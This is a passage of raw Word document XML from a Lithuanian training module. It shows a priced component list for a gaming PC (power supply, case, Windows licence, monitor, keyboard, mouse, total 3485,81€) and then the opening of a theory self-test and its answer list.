              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Maitinimo šaltinis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3B365DF2" w14:textId="59A8FAB6" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="5EEF078D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Fortron HYDRO G PRO 1000W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="16E03204" w14:textId="347AB91E" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="63E7C541" w14:textId="12C9E47E" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="39DA90A1" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>144</w:t>
            </w:r>
            <w:r w:rsidR="003D0977" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="63B4E742" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="29D98044" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2DADFB4F" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5C77775A" w14:textId="115E5992" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Korpusas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0EAEC623" w14:textId="59A8FAB6" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="235FEC17" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MSI MAG FORGE 101M + FILTR (P)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0CF0CF7A" w14:textId="270A5176" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5D4B0B67" w14:textId="4976B3CB" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="0CC47FFF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="29D98044" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="003D0977" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="29D98044" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>49€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="575447CE" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7552DD80" w14:textId="1B7947DB" w:rsidR="7C610705" w:rsidRPr="005A5C28" w:rsidRDefault="7C610705" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operacinė sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5F7A96F9" w14:textId="24E8779D" w:rsidR="7C610705" w:rsidRPr="005A5C28" w:rsidRDefault="7C610705" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operacinė sistema Microsoft Windows 10 Home 32/64 BIT daugiakalbė, elektroninės licenzijos raktas, galima perkelti į kitą kompiuterį (ne dažniau kaip 90 dienų) atsisiunčiama internetu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4C8D0E07" w14:textId="68A205C9" w:rsidR="7C610705" w:rsidRPr="005A5C28" w:rsidRDefault="7C610705" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2DD3137A" w14:textId="0E3EE951" w:rsidR="7C610705" w:rsidRPr="005A5C28" w:rsidRDefault="7C610705" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>122</w:t>
            </w:r>
            <w:r w:rsidR="003D0977" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>69€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="076F24AC" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53142FCD" w14:textId="329E96E5" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Monitorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="42955A70" w14:textId="59A8FAB6" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="2E8E4748" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Asus ROG STRIX XG438Q</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2281C31D" w14:textId="25450595" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2D052719" w14:textId="32D95948" w:rsidR="23AF87C1" w:rsidRPr="005A5C28" w:rsidRDefault="23AF87C1" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1155</w:t>
            </w:r>
            <w:r w:rsidR="003D0977" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="29D98044" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>00€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="48F78CC0" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="740DBB12" w14:textId="09762434" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Klaviatūra</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="70EFA355" w14:textId="07964D6F" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="018D6DBE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A4Tech Bloody B3370R RGB Keyboard (8x Mechanical LK Libra Brown Switch)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="22EC1169" w14:textId="61561736" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4727ADA5" w14:textId="06094378" w:rsidR="3A57DD52" w:rsidRPr="005A5C28" w:rsidRDefault="3A57DD52" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="003D0977" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="155F7899" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r w:rsidR="29D98044" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="63134C2A" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2F032796" w14:textId="08927C8E" w:rsidR="15DA38DB" w:rsidRPr="005A5C28" w:rsidRDefault="15DA38DB" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pelė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="51EF1519" w14:textId="07964D6F" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="72D1E027" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A4Tech Bloody P80 PRO RGB Pixart (Activate) Gaming Mouse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="74129AE3" w14:textId="0A49C3D9" w:rsidR="72D1E027" w:rsidRPr="005A5C28" w:rsidRDefault="72D1E027" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0F1BF552" w14:textId="0ABA9080" w:rsidR="795270C4" w:rsidRPr="005A5C28" w:rsidRDefault="795270C4" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="003D0977" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>69€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="29D98044" w:rsidRPr="005A5C28" w14:paraId="408F1744" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="396E10BC" w14:textId="60628F4E" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>IŠ VISO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7EE858B7" w14:textId="4FA0D45C" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7F258EB0" w14:textId="44E53BB4" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="282376FB" w14:textId="07964D6F" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="11D070AE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3485</w:t>
            </w:r>
            <w:r w:rsidR="003D0977" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="0CEA8EF8" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>81</w:t>
            </w:r>
            <w:r w:rsidR="7BC77D18" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F7CED87" w14:textId="2BBBA7FE" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00B0488D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="553647ED" w14:textId="77777777" w:rsidR="001A5FFF" w:rsidRPr="005A5C28" w:rsidRDefault="001A5FFF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>7 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> TESTAS. ĮSIVERTINTINK MODULIO TEORINIŲ ŽINIŲ GEBĖJIMUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF2305" w14:textId="2BBBA7FE" w:rsidR="007E49A8" w:rsidRPr="005A5C28" w:rsidRDefault="007E49A8"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TESTO ATSAKYMAI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8AEA04" w14:textId="35DB70FB" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="77A8712A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A)</w:t>
      </w:r>
      <w:r w:rsidR="00BB54AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DE899A" w14:textId="3E8A0AB3" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="77A8712A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
